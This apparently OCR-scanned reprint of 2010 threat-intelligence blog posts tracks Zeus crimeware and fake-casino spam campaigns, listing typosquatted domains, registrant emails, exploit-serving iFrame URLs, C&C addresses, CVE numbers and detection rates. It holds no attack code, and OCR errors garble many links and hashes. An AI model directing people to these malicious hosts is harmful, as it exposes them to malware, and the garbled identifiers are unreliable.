erdca.ne.kr - Email: WeedDamel6427@hotmail.com 
erdca.or.kr - Email: WeedDamel6427@hotmail.com 
erdcb.kr - Email: WeedDamel6427@hotmail.com 
erdcd.kr - Email: WeedDamel6427@hotmail.com 
erdce.co.kr - Email: WeedDamel6427@hotmail.com 
erdce.kr - Email: WeedDamel6427@hotmail.com 
erdce.ne.kr - Email: WeedDamel6427@hotmail.com 
erdce.or.kr - Email: WeedDamel6427@hotmail.com 
erdcq.kr - Email: WeedDamel6427@hotmail.com 
erdcu.co.kr - Email: WeedDamel6427@hotmail.com 
erdcu.kr - Email: WeedDamel6427@hotmail.com 
erdcu.ne.kr - Email: WeedDamel6427@hotmail.com 



erdcu.or.kr - Email: WeedDamel6427@hotmail.com 
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yrxc.co.kr - Email: WeedDamel6427@hotmail.com 

yrxc.kr - Email: WeedDamel6427@hotmail.com 

yrxc.or.kr - Email: WeedDamel6427@hotmail.com 

yrxo.co.kr - Email: WeedDamel6427@hotmail.com 

yrxo.kr - Email: WeedDamel6427@hotmail.com 

yrxo.ne.kr - Email: WeedDamel6427@hotmail.com 

yrxo.or.kr - Email: WeedDamel6427@hotmail.com 

yrxs.co.kr - Email: WeedDamel6427@hotmail.com 

yrxs.kr - Email: WeedDamel6427@hotmail.com 

yrxs.ne.kr - Email: WeedDamel6427@hotmail.com 

yrxs.or.kr - Email: WeedDamel6427@hotmail.com 

rtsle3en.me.uk 

rtsle3eq.me.uk 

rtsle3ew.me.uk 

rtsle3ex.me.uk 

rtsle3ey.me.uk 

rtsle3ez.me.uk 


rtsle3eb.co.uk 



rtsle3en.co.uk 


rtsle3eq.co.uk 

rtsle3er.co.uk 

rtsle3ew.co.uk 

rtsle3ex.co.uk 

rtsle3ey.co.uk 

rtsle3ez.co.uk 

Name servers of notice: 

nsl.skc-realty.com - 89.238.165.195 - Email: 
skc@realty.net 

nsl.chinafromasia.com 

UPDATED: Monday, February 22, 2010 - Another 
typosquatted domains portfolio is being spamvertised, in¬ 
cluding two new name servers, parked on the same IP where 
name servers from previous campaigns were hosted. 
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204 85 72179 -—► 204 84 0 0715 -—-► AS81 



Typosquatted domains, and name servers of notice are as 
follows: 

dese.co.kr - Email: asondrapgt@hotmail.com 
dese.kr - Email: asondrapgt@hotmail.com 
dese.ne.kr - Email: asondrapgt@hotmail.com 






























dese.or.kr - Email: asondrapgt@hotmail.com 
desr.co.kr - Email: asondrapgt@hotmail.com 
desr.kr - Email: asondrapgt@hotmail.com 
desr.or.kr - Email: asondrapgt@hotmail.com 
desv.co.kr - Email: asondrapgt@hotmail.com 
desv.kr - Email: asondrapgt@hotmail.com 
desv.ne.kr - Email: asondrapgt@hotmail.com 
desv.or.kr - Email: asondrapgt@hotmail.com 
desx.co.kr - Email: asondrapgt@hotmail.com 
desx.kr - Email: asondrapgt@hotmail.com 
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desx.ne.kr - Email: asondrapgt@hotmail.com 
desx.or.kr - Email: asondrapgt@hotmail.com 

edasa.co.kr 

edasa.kr 

edasa.ne.kr 

edasa.or.kr 

edase.co.kr 

edase.kr 


edase.ne.kr 



edase.or.kr 


edasn.kr 

edasn.ne.kr 

edasn.or.kr 

edasq.co.kr 

edasq.kr 

edasq.ne.kr 

edasq.or.kr 

Name servers of notice: 

nsl.silverbrend.net - 87.117.245.9 - Email: 
klincz@aol.com 

nsl.hourscanine.com - 87.117.245.9 - Email: 
carruawau@gmail.com 

UPDATED: Sunday, February 21, 2010 - The gang is 
currently spamming a phishing campaign - no client-side 

serving iFrames found so far - attempting to steal Google 
account and Blogspot accounting data. Given the fact that 
the gang is capable of generating hundreds of thousands of 
bogus accounts on their own, as well as buy them in bulk 
orders from vendors that have already built such an 
inventory across multiple social networking sites, the only 
logical reason for attempting to phish for such data would be 
to attempt to maliciously monetize the traffic of legitimate 
blogs. 
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The newly spamvertised domains, including a new name 
server are as follows: 

esub.co.kr - Email: osamplerl61@hotmail.com 
esub.kr - Email: osamplerl61@hotmail.com 
esub.ne.kr - Email: osamplerl61@hotmail.com 
esug.co.kr - Email: osamplerl61@hotmail.com 
esug.kr - Email: osamplerl61@hotmail.com 
esug.ne.kr - Email: osamplerl61@hotmail.com 











esuk.kr - Email: osamplerl61@hotmail.com 
esuk.ne.kr - Email: osamplerl61@hotmail.com 
esuk.or.kr - Email: osamplerl61@hotmail.com 
esus.co.kr - Email: osamplerl61@hotmail.com 
esus.kr - Email: osamplerl61@hotmail.com 

esus. ne.kr - Email: osamplerl61@hotmail.com 

esut. co.kr - Email: osamplerl61@hotmail.com 

esut.kr - Email: osamplerl61@hotmail.com 

esut.ne.kr - Email: osamplerl61@hotmail.com 

nsl.nitroexcel.com - 89.238.165.195 (the same IP was 
also hosting the name server domains from previous 
campaigns) - Email: rackmodule@writemail.com 

UPDATED: Saturday, February 20, 2010 - The client-side 
exploit serving iFrame directory has been changed to 
91.201.196.101 /usaspll/in.php, with another 
typosquatted portfolio of domains currently being 
spamvertised. 
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114.27.00/16 


AS3462 


114 27 36147 



Detection rates: update.exe - [5]Trojan.Zbot - Result: 25/40 
(62.5 %) (phones back to trollar.ru /cnf/trl.jpg - 

109.95.114.133 - Email: bernardo_pr@inbox.ru); file.exe - 

[6] Trojan.Spy.ZBot. 12544.1 - Result: 26/41 (63.42 %); ie.js - 

[7] JS:CVE-2008-0015-G - Result: 14/40 (35 %); ie2.js - 

[8] Exploit:JS/CVE-2008-0015 - Result: 17/40 (42.5 %); 
nowTrue.swf - [9]Trojan.SWF.Dropper.E - Result: 24/41 
(58.54 %); pdf.pdf - [10JExploit.JS.Pdfka.bin - Result: 11/41 



























(26.83 %); swf.swf - [ll]SWF/Exploit.Agent.BS - Result: 
8/40 (20 %). 

Domain portfolio, name server of notice - 
nsl.vektoroils.net - 74.117.63.218 - Email: 
admin@forsyte.info : desa.co.kr - Email: 
hjfeasey@yahoo.co.uk 

desa.kr - Email: hjfeasey@yahoo.co.uk 

desa.ne.kr - Email: hjfeasey@yahoo.co.uk 

desa. or.kr - Email: hjfeasey@yahoo.co.uk 

desb. co.kr - Email: hjfeasey@yahoo.co.uk 
desb.kr - Email: hjfeasey@yahoo.co.uk 
desb.ne.kr - Email: hjfeasey@yahoo.co.uk 
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116 80 31 193 -^-► 116 80 0 0/14 -*2- AS2510 



desb.or.kr - Email: hjfeasey@yahoo.co.uk 
deso.kr - Email: hjfeasey@yahoo.co.uk 
deso.or.kr - Email: hjfeasey@yahoo.co.uk 
desv.kr - Email: hjfeasey@yahoo.co.uk 
desz.co.kr - Email: hjfeasey@yahoo.co.uk 

































desz.kr - Email: hjfeasey@yahoo.co.uk 

desz.ne.kr - Email: hjfeasey@yahoo.co.uk 

desz.or.kr - Email: hjfeasey@yahoo.co.uk 

UPDATED: Wednesday, February 17, 2010 - The iFrame 
directory has been changed to 91.201.196.101 /us- 

asp/in.php, detection rate forupdate.exe - [12]Trojan- 
Spy.Win32.Zbot.gen - Result: 17/40 (42.5 %). 
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Currently active and spamvertised domains include: 
saqwk.co.kr - Email: Camerc05@yahoo.com 
saqwk.kr - Email: Camerc05@yahoo.com 
saqwk.ne.kr - Email: Camerc05@yahoo.com 
saqwk.or.kr - Email: Camerc05@yahoo.com 
saqwm.co.kr - Email: Camerc05@yahoo.com 
saqwm.kr - Email: Camerc05@yahoo.com 
saqwm.ne.kr - Email: Camerc05@yahoo.com 
saqwq.co.kr - Email: Camerc05@yahoo.com 
saqwq.kr - Email: Camerc05@yahoo.com 
saqwq.ne.kr - Email: Camerc05@yahoo.com 
saqwq.or.kr - Email: Camerc05@yahoo.com 
saqwz.co.kr - Email: Camerc05@yahoo.com 



saqwz.kr - Email: Camerc05@yahoo.com 

saqwz.ne.kr - Email: Camerc05@yahoo.com 

saqwz.or.kr - Email: Camerc05@yahoo.com 

As anticipated, the botnet masters behind the systematically 
rotated campaigns dissected in previous posts, 

kick off the week with multiple campaigns parked on the 
newly introduced fast-fluxed domains. 
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168 122 176 29 - 168 122 128 W17 -—-► AS111 



In a typical multitasking fashion, two campaigns are 
currently active on different sub domains introduced at the 

typosquatted fast-flux ones, impersonating the U.S IRS with 
Unreported/Underreported Income (Fraud Application) 
theme", as well as a variation of the [13]already profiled 
PhotoArchive campaign, using a well known "[14] You don't 
have the latest version of Macromedia Flash Play eh' error 
message. 
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Let's dissect both campaigns, sharing the same fast-flux 
infrastructure, and currently spammed in the wild. 

Sample campaign URLs from the PhotoArchive, 
SecretArchives themed campaign: 

- archive .repok.or.kr/archive0714/?id=test@test.com 

- secretarchives .renyn.kr/archive0714/? 
id=test@test.com 

- secretfiles .repolit.me.uk/archive0714/? 
id=test@test.com 

- secretarchives .renyn.ne.kr/archive0714/? 
id=test@test.com 

- postcards .repolix.co.uk/archive0714/? 
id=test@test.com 

Sample sub domain structure: 

anonymousfiles .repoli2.me.uk 
archive .repoliq.me.uk 
archive .repolit.me.uk 
archives .repolil.me.uk 
filearchive .repolil.me.uk 


files .repolit.me.uk 
files .repolix.me.uk 
files4friends .repolit.me.uk 
secretarchives .repoliq.me.uk 
secretarchives .repoliw.me.uk 
secretarchives .repolix.me.uk 
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secretfiles .repoliq.me.uk 
sendspace .repoli2.me.uk 
archive .repolix.co.uk 
archives .repoliq.co.uk 
archives .repolix.co.uk 
files .repoliq.co.uk 
files4friends .repolix.co.uk 
incognito .repoliq.co.uk 
postcard .repoliq.co.uk 
postcard .repoliw.co.uk 
secretarchives .repoliw.co.uk 
www.irs.gov.repolix.co.uk 



Embedded iFrame - 91.201.196.101 /ukasp/in.php 

(AS42229 (MARIAM-AS PP Mariam) attempts to exploit 

[15]CVE-2007-5659; [16]CVE-2008-2992; [17JCVE-2008- 
0015; [18]CVE-2009-0927 and [19]CVE-2009-4324. Upon 

successful exploitation, file.exe - [20]Trojan- 
Spy.Win32.Zbot.gen - Result: 12/41 (29.27 %) is served. Just 
like the original update.exe - [21]Trojan.Zbot - Result: 

13/40 (32.50 %) available as a manual download from the 
pages, both 

[22]samples phone back to the well known elnasa.ru 
/asd/elnasa.ble - 109.95.114.71 - Email: kievsk@yandex.ru 


[23]Aleksey V Kijanskiy. 

Naturally, [24JAS42229 (MARIAM-AS PP Mariam) is a 
cybercrime-friendly AS, with the following currently ac¬ 
tive Zeus C &Cs parked there: 

91.201.196.35 

91.201.196.75 

91.201.196.76 
91.201.196.38 
91.201.196.34 


91.201.196.37 

Sample URL from the IRS-themed campaign: 



- irs.gov 

.renyn.kr/fraud. applications/application/statement, ph 
P 

Sample iFrame from the IRS-themed campaign - 

109.95.114.251 /usa50/in.php is currently down. The 
same 

IP was used to serve client-side exploits in a previous 
campaign - "[25] Pushdo Serving Crimeware, Client-Side 
Exploits and Russian Bride Scams ". 

Detection rate fortax-statement.exe - [26]Trojan- 
Spy.Win32.Zbot.gen - Result: 37/41 (90.25 %), [27]which 
upon execution phones [28]back to the well known 
nekovo.ru /cbd/ nekovo.br - 109.95.115.18 - Email: 
kievsk@yandex.ru 

- Aleksey V Kijanskiy 
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Active and spamvertised fast-fluxed domains part of the 
campaign: 

renya.co.kr - Email: Sethdc77@yahoo.co.uk 
renya.kr - Email: Sethdc77@yahoo.co.uk 
renya.ne.kr - Email: Sethdc77@yahoo.co.uk 
renya.or.kr - Email: Sethdc77@yahoo.co.uk 
renyn.kr - Email: Sethdc77@yahoo.co.uk 
renyn.ne.kr - Email: Sethdc77@yahoo.co.uk 


renyn.or.kr - Email: Sethdc77@yahoo.co.uk 
renyo.co.kr - Email: Sethdc77@yahoo.co.uk 
renyo.kr - Email: Sethdc77@yahoo.co.uk 
renyo.ne.kr - Email: Sethdc77@yahoo.co.uk 
renyo.or.kr - Email: Sethdc77@yahoo.co.uk 
renyx.co.kr - Email: Sethdc77@yahoo.co.uk 
renyx.kr - Email: Sethdc77@yahoo.co.uk 
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renyx.ne.kr - Email: Sethdc77@yahoo.co.uk 
renyx.or.kr - Email: Sethdc77@yahoo.co.uk 
rep021.co.kr - Email: DRendell3407@hotmail.com 
rep021.kr - Email: DRendell3407@hotmail.com 
rep021.ne.kr - Email: DRendell3407@hotmail.com 
rep021.or.kr - Email: DRendell3407@hotmail.com 
rep022.co.kr - Email: DRendell3407@hotmail.com 
rep022.kr - Email: DRendell3407@hotmail.com 
rep022.ne.kr - Email: DRendell3407@hotmail.com 
rep022.or.kr - Email: DRendell3407@hotmail.com 
rep023.co.kr - Email: DRendell3407@hotmail.com 
rep023.kr - Email: DRendell3407@hotmail.com 



rep023.or.kr - Email: DRendell3407@hotmail.com 
rep024.kr - Email: DRendell3407@hotmail.com 
rep071.co.kr - Email: KantuM37690@hotmail.com 
rep071.kr - Email: KantuM37690@hotmail.com 
rep071.ne.kr - Email: KantuM37690@hotmail.com 
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rep071.or.kr - Email: KantuM37690@hotmail.com 
rep072.co.kr - Email: KantuM37690@hotmail.com 
rep072.kr - Email: KantuM37690@hotmail.com 
rep072.ne.kr - Email: KantuM37690@hotmail.com 
rep072.or.kr - Email: KantuM37690@hotmail.com 
rep073.co.kr - Email: KantuM37690@hotmail.com 
rep073.kr - Email: KantuM37690@hotmail.com 
rep073.ne.kr - Email: KantuM37690@hotmail.com 
rep073.or.kr - Email: KantuM37690@hotmail.com 
rep074.co.kr - Email: KantuM37690@hotmail.com 
rep074.ne.kr - Email: KantuM37690@hotmail.com 
rep074.or.kr - Email: KantuM37690@hotmail.com 
repl051.co.uk 


repl051.me.uk 

repl051.org.uk 

repl051.uk.com 

repak.co.kr - Email: limhomeslm@yahoo.co.uk 
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repak.kr - Email: limhomeslm@yahoo.co.uk 
repak.ne.kr - Email: limhomeslm@yahoo.co.uk 
repak.or.kr - Email: limhomeslm@yahoo.co.uk 
repaz.co.kr - Email: Olb55768@yahoo.co.uk 
repaz.kr - Email: Olb55768@yahoo.co.uk 
repaz.or.kr - Email: Olb55768@yahoo.co.uk 
repek.co.kr - Email: limhomeslm@yahoo.co.uk 
repek.ne.kr - Email: limhomeslm@yahoo.co.uk 
repek.or.kr - Email: limhomeslm@yahoo.co.uk 
repey.co.kr - Email: Olb55768@yahoo.co.uk 
repey.kr - Email: Olb55768@yahoo.co.uk 
repey.ne.kr - Email: Olb55768@yahoo.co.uk 
repey.or.kr - Email: Olb55768@yahoo.co.uk 
repia.co.kr - Email: Olb55768@yahoo.co.uk 
repia.kr - Email: Olb55768@yahoo.co.uk 



repia.ne.kr - Email: Olb55768@yahoo.co.uk 
repia.or.kr - Email: Olb55768@yahoo.co.uk 
repik.co.kr - Email: limhomeslm@yahoo.co.uk 
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repik.kr - Email: limhomeslm@yahoo.co.uk 
repik.or.kr - Email: limhomeslm@yahoo.co.uk 
repok.co.kr - Email: limhomeslm@yahoo.co.uk 
repok.kr - Email: limhomeslm@yahoo.co.uk 
repok.ne.kr - Email: limhomeslm@yahoo.co.uk 
repok.or.kr - Email: limhomeslm@yahoo.co.uk 
repoy.co.kr - Email: Olb55768@yahoo.co.uk 
repoy.kr - Email: Olb55768@yahoo.co.uk 
repoy.ne.kr - Email: Olb55768@yahoo.co.uk 
repoy.or.kr - Email: Olb55768@yahoo.co.uk 
repolil.co.uk 
repolil.me.uk 
repoli2.co.uk 
repoli2.me.uk 
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repoli3.co.uk 

repolie.co.uk 

repolio.co.uk 

repoliq.co.uk 

repoliq.me.uk 

repolit.me.uk 

repoliw.co.uk 

repoliw.me.uk 

repolix.co.uk 

repolix.me.uk 

Name servers of notice: 


nsl .skcrealestate.net - 89.238.165.195 - Email: 
support@skrealty.net 

nsl .addressway.net - 89.238.165.195 - Email: 
poolbill@hotmail.com 

nsl .skcpanel.com - 64.20.42.235 - Email: 
support@sk.com 

nsl .holdinglory.com - 64.20.42.235 - Email: 
greysy@gmx.com 

nsl .skcres.com - 64.20.42.235 - Email: hr@skc.net 

nsl .x-videocovers.net - 64.20.42.235 - Email: 
storylink@live.com 



Interestingly, researchers from [29]M86 Security gained 
access to the web malware exploitation kit used in a 

previous campaign: 

" It has been up and running and serving exploits for nearly 
a day. In this time almost 40,000 unique users 

have been exposed to these exploits, and the Zeus 
file has been downloaded over 5000 times. These 
downloads do not include the PhotoArchive.exe file 
downloads that a user may be tricked into downloading and 
executing 

themselves. " 

Updated will be posted as soon as new developments 
emerge. 

Related coverage of the gang's previous campaigns: 

[30] Tax Report Themed Zeus/Client-Side Exploits Serving 
Campaign in the Wild 

[31] PhotoArchive Crimeware/Client-Side Exploits Serving 
Campaign in the Wild 

[32] Facebook/AOL Update Tool Spam Campaign Serving 
Crimeware and Client-Side Exploits 

[33] Pushdo Serving Crimeware, Client-Side Exploits and 
Russian Bride Scams 

[34] Outlook Web Access Themed Spam Campaign Serves 
Zeus Crimeware 

[35] Pushdo Injecting Bogus Swine Flu Vaccine 



[36] "Your mailbox has been deactivated" Spam Campaign 
Serving Crimeware 

[37] Ongoing FDIC Spam Campaign Serves Zeus Crimeware 

[38] The Multitasking Fast-Flux Botnet that Wants to Bank 
With You 

This post has been reproduced from [39]Dancho Danchev's 
blog. Follow him [40Jon Twitter. 

1. 

http://www.virustotal.com/analisis/96682f571e65f50917099 

2e5b53b280edcb0ble85013al80b6fdlafd6fd877el-12670 

56760 

2 . 

http://www.virustotal.com/analisis/2ab5elc53bfd6dc914c79 

62da535f6el37c7f417d6187d8b01b917088536fd44-12670 

56805 

3. 

http://www.virustotal.com/analisis/f72cf75417e21eecf8defal 

a52a9601c4eb4dbfd3961e782bdlc0aa0157ce8fc-12670 

50041 

4. 

http://www.virustotal.com/analisis/84eal092d66c937771da9 

801505eblb7f926e416d34d7f8a43d457f2e4c33ada-12670 

50223 
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5. 

http://www.virustotal.com/analisis/efl20bf9f7791f0acefb05d 

462 8d2c2d87999938fdb9f3152142436 bc321ec05-l 2 666 

91798 

6 . 

http://www.virustotal.com/analisis/ea81al21b75fe8ad2e445 

cdl3a635Q850de2bf21cdb6dldc4eac247b2aac3a40"12G67 

08037 

7. 

http://www.virustotal.com/analisis/1983abeb8001365952fe0 

6814ab6a676acebac0blcbf4f3d2030de424b0del 30-12666 

91316 

8 . 

http://www.virustotal.com/analisis/f4dl9dca77a571b73eaelf 

0c3640db81cc257472flcc9e3flca0376216df4a91-12666 

91333 

9. 

http://www.virustotal.com/analisis/de54327ae5b208flf4570 

4d41ef03c02758f7fl2c2f63907db70429629c44df3-12666 

91345 

10 . 

http://www.virustotal.com/analisis/36e91b84b8e3f83a8044d 


















3c375398d9840dce4fl2d6c312f417e98f696dc34e0-12666 


91352 

11 . 

http://www.virustotal.com/analisis/6a0295a38536274beca2a 

f613afbadabbdd29cbfb669942b02aec810d68ff019-12666 

91365 

12 . 

http://www.virustotal.com/analisis/7556adl6c7507777c21a7 

3ebcc5d5ff3661f5e44a98899fll7aa96bc3246flfd-12664 

25345 

13. http://ddanchev.blo as pot.com/2010/02/photoarchive- 
crimewareclient-side.html 

14. http://irs/PhotoArchive%20Themed%20Zeus/Client- 
Side%20Exploits%20Servin a %20Campai a n%20in%20the%2 
OWild 

15. http://cve. mitre.or a/ca i-bin/cvename.c a i?name=CVE- 
2007-5659 

16. htto://cve.mitre.or a/ca i-bin/cvename.c a i?name=2008- 
2992 

17. htto://cve. mitre.or a/ca i-bin/cvename.c a i?name=2008- 
0015 

18. htto://cve. mitre.or a/ca i-bin/cvename.c a i?name=CVE- 
2009-0927 


19. h tto://cve. mitre.or a/ca i-bin/cvename.c a i?name=CVE- 
2009-4324 








































20 . 

http://www.virustotal.com/analisis/3d393354d40fc2a64cb68 

fe9fa51c575dablaf87065abbef811dd4d7e051db07-12662 

75738 

21 . 

http://www.virustotal.com/analisis/3aaa85a66689a9c092431 

27b0831e7294b3dbl91ce0c3e81ebc871fe843506fc-12662 

68338 


22. http://ddanchev.blo as pot.com/2010/01/pushdo-servin a- 
crimeware-client-side.html 


23. http://ddanchev.blo as pot.com/201Q/01/outlook-web- 
access-themed-spam-campai a n.html 

24. https://zeustracker.abuse.ch/monitor. ph p?as=42229 

25. http://ddanchev.blo as pot.com/201Q/01/pushdo-servin a- 
crimeware-client-side.html 

26. 

http://www.virustotal.com/analisis/f72cf75417e21eecf8defal 

a52a9601c4eb4dbfd3961e782bdlc0aa0157ce8fc-12662 

68334 


27. http://ddanchev.blo as pot.com/2010/02/phQtoarchive- 
crimewareclient-side.html 


28. http://ddanchev.blo as pot.com/2010/01/outlook-web- 
access-themed-spam-campai a n.html 


29. http://www.m86securitv.com/trace/traceitem.as p? 
article=1233 






































30. http://ddanchev.blo as pot.com/2010/02/tax-reoort- 
themed-zeusclient-side.html 


31. http://ddanchev.blo as pot.com/2010/02/photoarchive- 
crimewareclient-side.html 


32. http://ddanchev.blo as pot.com/2010/01/facebookaol- 
u pdate-tool-soam-campai a n.html 

33. http://ddanchev.blo as pot.com/2010/01/pushdo-servin a- 
crimeware-client-side.html 


34. http://ddanchev.blo as pot.com/2010/01/outlook-web- 
access-themed-soam-camoai a n.html 

35. http://ddanchev.blo as pot.com/2009/12/pushdo- iini ectin a- 
bo a us-swine-flu.html 

36. http://ddanchev.blo as pot.com/20Q9/ll/vour-mailbox- 
has-been-deactivated-soam.html 

37. http://ddanchev.blo as pot.com/20Q9/10/on a oin a -fdic- 
s oam-camoai a n-serves-zeus.html 

38. http://ddanchev.blQ as pot.com/2009/07/multitaskin a -fast- 
f1ux-botnet-that.html 


39. http://ddanchev.blo as oot.com/ 

40. http://twitter.com/danchodanchev 
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Over the past week and a half, cybercriminals have been 
aggressively spamvertising a growing portfolio of domains, 
relying on deceptive advertising for nonexistent and 
fraudulent online gambling web sites, serving the well known 
Win32. GAMECasino. 

• Go through related posts: [l]Don't Play Poker on an 
Infected Table; [2]Malware(Client-Side Exploits) Serving 

Online Casinos 

What's particularly interesting about the campaign, is the 
fact that all of the domains serve identical template, with the 
SmartDownload.exe binary hosted "in the cloud" thanks to 
Amazon's Web Services (anat.s3.amazonaws.com/dir4/ 

SmartDownload.exe). 

Detecting rate forSmartDownload.exe - 
[3]Win32.GAMECasino - Result: 10/42 (23.81 %). 

Sample phones 

back the following domain - 

download.realtimegaming.com 

/cdn/goldvipclub/package list.ini.zip?fakeParam = 1 

- 212.201.100.144 - Email: admin@REALTIMEGAMING.COM; 
RealTime Gaming Holding Company, LLC, registered 

under the following address according to the information 
published on their web site: 
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• For Licensing opportunities or Company lnformation r please 
submit request to Hasting B. V Click Here. Hastings 
International B. V.New Haven Office CenterEmancipatie 
Boulevard 31 - P.O. Box 6052Curacao Netherlands An-tilles 

Here are the spavertised domains in question, including the 
name servers involved. 

Spamvertised domains parked on 116.123.221.17; 
112.159.237.58: 

aerojackpot.net - Email: dfgdfgvcsxl2@foxmail.com 
compujackpot.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotadvance.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotalist.net - Email: dfgdfgvcsxl2@foxmail.com 
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jackpotbee.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotbuzz.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotcanyon.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotclubs.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotfairy.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotfan.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotflag.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpoticity.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotjets.net - Email: dfgdfgvcsxl2@foxmail.com 




jackpotlodge.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotlodge.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotmoment.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotpair.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotrocket.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotthink.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpottodoor.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotwire.net - Email: dfgdfgvcsxl2@foxmail.com 
jacpotcongress.net - Email: dfgdfgvcsxl2@foxmail.com 
linejackpot.net - Email: dfgdfgvcsxl2@foxmail.com 
lux777cazino.net - Email: efghfgbvghfgh@qq.com 
majicjackpot.net - Email: dfgdfgvcsxl2@foxmail.com 
midjackpot.net - Email: dfgdfgvcsxl2@foxmail.com 
mixerjackpot.net - Email: dfgdfgvcsxl2@foxmail.com 
needjackpot.net - Email: dfgdfgvcsxl2@foxmail.com 
nestjackpot.net - Email: dfgdfgvcsxl2@foxmail.com 
shopjackpot.net - Email: dfgdfgvcsxl2@foxmail.com 
smart-nest.net - Email: dfgdsfvcb@163.com 
structjackpot.net - Email: dfgdfgvcsxl2@foxmail.com 
the-cash.net - Email: dfgdsfvcb@163.com 




thejackpots.net - Email: dfgdfgvcsxl2@foxmail.com 
windowjackpots.net - Email: dfgdfgvcsxl2@foxmail.com 
win-vox.net - Email: dfgdsfvcb@163.com 
aerowin.net - Email: dfgdsfvcb@163.com 
beach-jackpot.net - Email: dfgdsfvcb@163.com 
beautyselite.net - Email: dfgdsfvcb@163.com 
binwin.net - Email: dfgdsfvcb@163.com 
clashflash.net - Email: dfgdsfvcb@163.com 
couldwin.net - Email: dfgdsfvcb@163.com 
dinwin.net - Email: dfgdsfvcb@163.com 
eliteclasss.net - Email: dfgdsfvcb@163.com 
eliteorder.net - Email: dfgdsfvcb@163.com 
eliteplaza.net - Email: dfgdsfvcb@163.com 
elitescoop.net - Email: dfgdsfvcb@163.com 
eliteweird.net - Email: dfgdsfvcb@163.com 
ezelite.net - Email: dfgdsfvcb@163.com 
flashapex.net - Email: dfgdsfvcb@163.com 
flashbrook.net - Email: dfgdsfvcb@163.com 
flashbuzzs.net - Email: dfgdsfvcb@163.com 
flashcensus.net - Email: dfgdsfvcb@163.com 
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flashclashs.net - Email: dfgdsfvcb@163.com 
flashlasch.net - Email: dfgdsfvcb@163.com 
flashlash.net - Email: dfgdsfvcb@163.com 
flashmoment.net - Email: dfgdsfvcb@163.com 
flashnest.net - Email: dfgdsfvcb@163.com 
flashpixie.net - Email: dfgdsfvcb@163.com 
flashslash.net - Email: dfgdsfvcb@163.com 
flashspark.net - Email: dfgdsfvcb@163.com 
flashspell.net - Email: dfgdsfvcb@163.com 
flashzap.net - Email: dfgdsfvcb@163.com 
free-smart.net - Email: dfgdsfvcb@163.com 
ginwin.net - Email: dfgdsfvcb@163.com 
goingtowins.net - Email: dfgdsfvcb@163.com 
hitecwinner.net - Email: dfgdsfvcb@163.com 
innerwinner.net - Email: dfgdsfvcb@163.com 
interelite.net - Email: dfgdsfvcb@163.com 
jackpot-direct.net - Email: dfgdsfvcb@163.com 
jackpot-fire.net - Email: dfgdsfvcb@163.com 


jackpot-help.net - Email: dfgdsfvcb@163.com 
jackpot-infinity.net - Email: dfgdsfvcb@163.com 
jackpot-mind.net - Email: dfgdsfvcb@163.com 
jackpot-minute.net - Email: dfgdsfvcb@163.com 
jackpot-phone.net - Email: dfgdsfvcb@163.com 
jackpot-reunion.net - Email: dfgdsfvcb@163.com 
jackpot-senate.net - Email: dfgdsfvcb@163.com 
jackpot-talk.net - Email: dfgdsfvcb@163.com 
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jackpot-taven.net - Email: dfgdsfvcb@163.com 
jackpot-topia.net - Email: dfgdsfvcb@163.com 
jackpot-wire.net - Email: dfgdsfvcb@163.com 
laschflash.net - Email: dfgdsfvcb@163.com 
learn-jackpot.net - Email: dfgdsfvcb@163.com 
magicwinner.net - Email: dfgdsfvcb@163.com 
mapwinner.net - Email: dfgdsfvcb@163.com 
mediaselite.net - Email: dfgdsfvcb@163.com 
mindelite.net - Email: dfgdsfvcb@163.com 
mrelite.net - Email: dfgdsfvcb@163.com 



needwin.net - Email: dfgdsfvcb@163.com 
pixiewinner.net - Email: dfgdsfvcb@163.com 
powerwinners.net - Email: dfgdsfvcb@163.com 
predict-jackpot.net - Email: dfgdsfvcb@163.com 
pushelite.net - Email: dfgdsfvcb@163.com 
reseachelite.net - Email: dfgdsfvcb@163.com 
sellelite.net - Email: dfgdsfvcb@163.com 
sgameelite.net - Email: dfgdsfvcb@163.com 
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sharpwinner.net - Email: dfgdsfvcb@163.com 
smart-enough.net - Email: dfgdsfvcb@163.com 
smart-fire.net - Email: dfgdsfvcb@163.com 
smart-log.net - Email: dfgdsfvcb@163.com 
smart-nest.net - Email: dfgdsfvcb@163.com 
smart-spree.net - Email: dfgdsfvcb@163.com 
steelites.net - Email: dfgdsfvcb@163.com 
surveylite.net - Email: dfgdsfvcb@163.com 
targetelite.net - Email: dfgdsfvcb@163.com 
theelites.net - Email: dfgdsfvcb@163.com 
theflashers.net - Email: dfgdsfvcb@163.com 



theywin.net - Email: dfgdsfvcb@163.com 
velowinner.net - Email: dfgdsfvcb@163.com 
vote-smart.net - Email: dfgdsfvcb@163.com 
wanttowin.net - Email: dfgdsfvcb@163.com 
winbot.net - Email: dfgdsfvcb@163.com 
winnercrest.net - Email: dfgdsfvcb@163.com 
winnerfast.net - Email: dfgdsfvcb@163.com 
winnerhut.net - Email: dfgdsfvcb@163.com 
winnerincumbent.net - Email: dfgdsfvcb@163.com 
winnermass.net - Email: dfgdsfvcb@163.com 
winnerpub.net - Email: dfgdsfvcb@163.com 
winnerrocket.net - Email: dfgdsfvcb@163.com 
winnersalon.net - Email: dfgdsfvcb@163.com 
winnerscan.net - Email: dfgdsfvcb@163.com 
winnertake.net - Email: dfgdsfvcb@163.com 
winnertal.net - Email: dfgdsfvcb@163.com 
winnertoyou.net - Email: dfgdsfvcb@163.com 
zap-smart.net - Email: dfgdsfvcb@163.com 
Name servers of notice: 

nsl.bb6ns.com - 58.83.8.45 - Email: li-zhenshu@163.com 



nsl.bedws.com - 218.61.126.28 - Email: 
guoxiufenghy@163.com 

nsl.catdogns.com - 218.61.126.28 - Email: li- 
zhenshu@163.com 

